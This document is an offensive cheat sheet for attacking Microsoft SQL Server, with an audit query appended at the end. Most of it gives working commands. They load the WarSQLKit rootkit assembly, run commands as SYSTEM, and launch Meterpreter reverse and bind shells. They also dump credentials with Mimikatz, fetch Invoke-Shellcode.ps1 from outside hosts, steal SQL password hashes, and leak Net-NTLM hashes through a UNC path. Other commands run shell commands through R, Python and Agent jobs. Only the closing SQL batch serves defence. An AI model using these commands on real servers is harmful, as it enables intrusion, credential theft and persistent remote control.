https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit

Importing the WarSQLKit DLL

Import WarSQLKit.dll as a hexadecimal byte stream.

CREATE ASSEMBLY [WarSQLKit]
AUTHORIZATION [dbo]
FROM 0x4D5A......
WITH PERMISSION_SET = UNSAFE;
GO

Create the stored procedure

CREATE PROCEDURE sp_cmdExec
@Command [nvarchar](max)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec
GO

Executing commands with WarSQLKit

WarSQLKit's CmdExec implements the following functions.

Execute an arbitrary Windows command

EXEC sp_cmdExec 'whoami';

Execute a Windows command with SYSTEM privileges

EXEC sp_cmdExec 'whoami /RunSystemPriv';

Run a PowerShell command with SYSTEM privileges

EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS';

Launch an x86 Meterpreter reverse TCP shell running as SYSTEM

EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem';

Launch an x64 Meterpreter reverse TCP shell running as SYSTEM

EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem';

Launch an x64 Meterpreter reverse RC4 shell running as SYSTEM (the RC4 password is fixed)

EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'
-- RC4PASSWORD=123456

Launch an x86 Meterpreter bind TCP shell running as SYSTEM

EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem';

Every Meterpreter launch spawns a new reverse-shell process.

Run the built-in Mimikatz to dump credentials

exec sp_cmdExec 'sp_Mimikatz';
select * from WarSQLKitTemp -- read the Mimikatz log

File download (URL, destination path, timeout in seconds)

EXEC sp_cmdExec 'sp_downloadFile http://test.com/Invoke--Shellcode.ps1 C:\test\Invoke--Shellcode.ps1 300';
EXEC sp_cmdExec 'sp_downloadFile http://10.251.0.33/Invoke--Shellcode.ps1 C:\test\Invoke--Shellcode.ps1 300';

Get the MSSQL login password hashes

EXEC sp_cmdExec 'sp_getSqlHash';

Get the Windows product information

EXEC sp_cmdExec 'sp_getProduct';

List the available databases

EXEC sp_cmdExec 'sp_getDatabases';

R and Python in SQL Server

SQL Server 2016 added R Services, and SQL Server 2017 extended it into Machine Learning Services with Python support. The feature lets Python and R scripts be run from T-SQL through sp_execute_external_script. The script runs in a separate Launchpad worker process under a low-privileged worker account rather than under the SQL Server service account, so whoami from such a script returns that worker account.

Requirements:

  • Machine Learning Services must be selected during SQL Server setup; it is a separate feature and is not installed by default
  • External scripts must be enabled:

    EXEC sp_configure 'external scripts enabled', 1
    RECONFIGURE WITH OVERRIDE

  • The database engine service must be restarted afterwards
  • The caller needs the EXECUTE ANY EXTERNAL SCRIPT database permission

R scripts

Execute a command with R (the first statement just displays the current value of the option):

sp_configure 'external scripts enabled'
GO
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

Capture a Net-NTLM hash with R. Pointing the R library path at a UNC share makes the worker process authenticate to testhost over SMB when it tries to load the (non-existent) package, so a listener on testhost captures the Net-NTLM challenge-response of the account running the script:

EXEC sp_execute_external_script
@language=N'R',
@script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")'

Python scripts

Return the Python interpreter version (pandas is used to build the output data set):

exec sp_execute_external_script 
@language =N'Python',
@script=N'import sys
import pandas
OutputDataSet = pandas.DataFrame([sys.version])'
WITH RESULT SETS ((python_version nvarchar(max)))

Execute a command:

exec sp_execute_external_script 
@language =N'Python',
@script=N'import subprocess
import pandas
p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE)
OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
WITH RESULT SETS (([cmd_out] nvarchar(max)))

Scheduled tasks through SQL Server Agent

Starting the SQL Server Agent service

SQL Server Agent is a Windows service that runs scheduled administrative jobs. Job steps execute under the Agent service account (or under a proxy account, if one is configured), not under the login that created the job; creating jobs requires sysadmin or membership in one of the SQLAgent roles in msdb. Agent is not included in Express Edition.

First start the SQL Server Agent service.

Creating a job

The job below has a single step in the PowerShell subsystem that runs cmd.exe and writes the output to a file. sp_add_jobserver binds the job to the local server; without it the job exists but never runs.

USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC dbo.sp_add_jobstep
    @job_name = N'test_powershell_job1',
    @step_name = N'test_powershell_name1',
    @subsystem = N'PowerShell',
    @command = N'c:\windows\system32\cmd.exe /c whoami /all >c:\\123.txt',
    @retry_attempts = 1,
    @retry_interval = 5;
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';
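As an added example (not part of the original article), the following audit batch covers every execution path described in this article in one pass: the instance options behind xp_cmdshell, OLE Automation, CLR and external scripts; TRUSTWORTHY databases and non-SAFE assemblies; Agent job steps that leave T-SQL; and the principals who can change any of it. It uses only documented catalog views; the guard around sys.trusted_assemblies is there because that view exists only from SQL Server 2017.

```sql
-- Added example, not from the original article. One audit pass over the execution paths
-- covered here. Run as sysadmin, or with VIEW SERVER STATE and VIEW ANY DEFINITION.

-- 1. Instance options that turn a SQL login into operating-system code execution.
SELECT name, CONVERT(int, value_in_use) AS value_in_use, is_dynamic
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled',
               'clr strict security', 'external scripts enabled', 'Agent XPs',
               'Ad Hoc Distributed Queries')
ORDER BY name;

-- 2. TRUSTWORTHY databases: the pre-2017 way to let UNSAFE assemblies load (msdb is ON by design).
SELECT name, SUSER_SNAME(owner_sid) AS owner, is_trustworthy_on
FROM sys.databases
WHERE is_trustworthy_on = 1 AND name <> 'msdb';

-- 3. User assemblies above SAFE in the current database (repeat per database with
--    sp_MSforeachdb), and the 2017+ trusted-hash list.
SELECT DB_NAME() AS db, name, permission_set_desc, create_date
FROM sys.assemblies
WHERE is_user_defined = 1 AND permission_set_desc <> 'SAFE';

IF OBJECT_ID(N'sys.trusted_assemblies') IS NOT NULL
    SELECT description, create_date, created_by FROM sys.trusted_assemblies;

-- 4. Agent job steps that leave T-SQL, with owner and last change time.
SELECT j.name AS job, js.step_id, js.subsystem, j.enabled,
       SUSER_SNAME(j.owner_sid) AS owner, j.date_modified, js.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS js ON js.job_id = j.job_id
WHERE js.subsystem IN ('CmdExec', 'PowerShell', 'ActiveScripting')
ORDER BY j.date_modified DESC;

-- 5. Principals that can flip the switches above, load UNSAFE code, or run external scripts
--    (the last is a database permission, so it is reported for the current database).
SELECT p.name, p.type_desc, sp.permission_name, sp.state_desc
FROM sys.server_principals AS p
JOIN sys.server_permissions AS sp ON sp.grantee_principal_id = p.principal_id
WHERE sp.permission_name IN ('CONTROL SERVER', 'ALTER SETTINGS',
                             'UNSAFE ASSEMBLY', 'EXTERNAL ACCESS ASSEMBLY')
UNION ALL
SELECT p.name, p.type_desc, 'sysadmin', 'MEMBER'
FROM sys.server_principals AS p
WHERE p.type IN ('S', 'U', 'G') AND IS_SRVROLEMEMBER('sysadmin', p.name) = 1
UNION ALL
SELECT dp.name, dp.type_desc, dpm.permission_name, dpm.state_desc
FROM sys.database_permissions AS dpm
JOIN sys.database_principals AS dp ON dp.principal_id = dpm.grantee_principal_id
WHERE dpm.permission_name = 'EXECUTE ANY EXTERNAL SCRIPT';
```

Every option in part 1 is dynamic (is_dynamic = 1), so an attacker with ALTER SETTINGS can enable it and disable it again inside one session without a restart; the snapshot therefore needs to be compared against a baseline rather than read once.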
